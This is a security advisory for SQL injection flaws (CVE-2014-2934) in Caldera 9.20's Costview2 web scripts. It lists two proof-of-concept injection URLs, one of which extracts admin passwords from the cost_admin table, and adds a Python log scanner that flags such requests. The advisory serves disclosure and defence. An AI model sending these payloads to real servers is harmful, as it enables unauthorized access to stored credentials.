Release date:
Updated on: 2014-05-10
Affected Systems:
Caldera Caldera 9.20
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67256
CVE (CAN) ID: CVE-2014-2934
Caldera is RIP, color management, and workflow software.
Multiple scripts in Caldera 9.20 and earlier versions contain SQL injection vulnerabilities. They are caused by the application's failure to properly filter user-supplied input before it is used in SQL commands. An attacker can exploit these vulnerabilities to perform unauthorized database operations.
<* Source: Thomas Fischer
Markus Wulftange
Link: http://www.kb.cert.org/vuls/id/693092
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
/Costview2/jobs.php?tr=0+union+select+1,2,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin
/Costview2/printers.php?id_onglet=0&tr=0+union+select+distinct,null,null,0,null&deb=0
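As an added defender-side example (not from the advisory, CERT, or the vendor), the following Python scans web-server access-log entries for requests to the two Costview2 scripts named above in which the integer parameters (tr, id_onglet, deb) carry non-numeric or SQL-keyword content, which is the signature of the injection described. The log lines are constructed; only the script paths and parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Scripts and parameters named in the advisory; the application expects integers here.
NUMERIC_PARAMS = {
    "/costview2/jobs.php": {"tr"},
    "/costview2/printers.php": {"id_onglet", "tr", "deb"},
}
SQL_KEYWORDS = re.compile(r"\b(union|select|from|where)\b", re.IGNORECASE)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def inspect_request(target):
    """Return a list of findings for one request target, or [] if it looks benign."""
    parts = urlsplit(target)
    expected = NUMERIC_PARAMS.get(parts.path.lower())
    if expected is None:
        return []
    findings = []
    # parse_qs decodes '+' and %xx once; unquote_plus again catches double encoding.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)
            if name.lower() in expected and not re.fullmatch(r"-?\d+", decoded.strip()):
                findings.append(f"{name}: non-numeric value {decoded!r}")
            elif SQL_KEYWORDS.search(decoded):
                findings.append(f"{name}: SQL keyword in {decoded!r}")
    return findings

def scan_log(lines):
    """Return (client ip, request target, findings) for every suspicious log line."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts

# Constructed sample lines in combined log format, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/May/2014:10:00:01 +0000] "GET /Costview2/jobs.php?tr=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/May/2014:10:00:02 +0000] "GET /Costview2/jobs.php?tr=0+union+select+1,2 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [10/May/2014:10:00:03 +0000] "GET /Costview2/printers.php?id_onglet=0&tr=1&deb=0 HTTP/1.1" 200 700',
    '10.0.0.7 - - [10/May/2014:10:00:04 +0000] "GET /index.php?q=union HTTP/1.1" 200 300',
]
if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(findings))
```

Only the second constructed line is reported; the benign printers.php request and the unrelated index.php hit are ignored.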
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Caldera
-------
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://www.caldera.com/support/
http://www.caldera.com/product/version-9-20/
http://www.caldera.com/product/options/costview/
This article permanently updates the link address: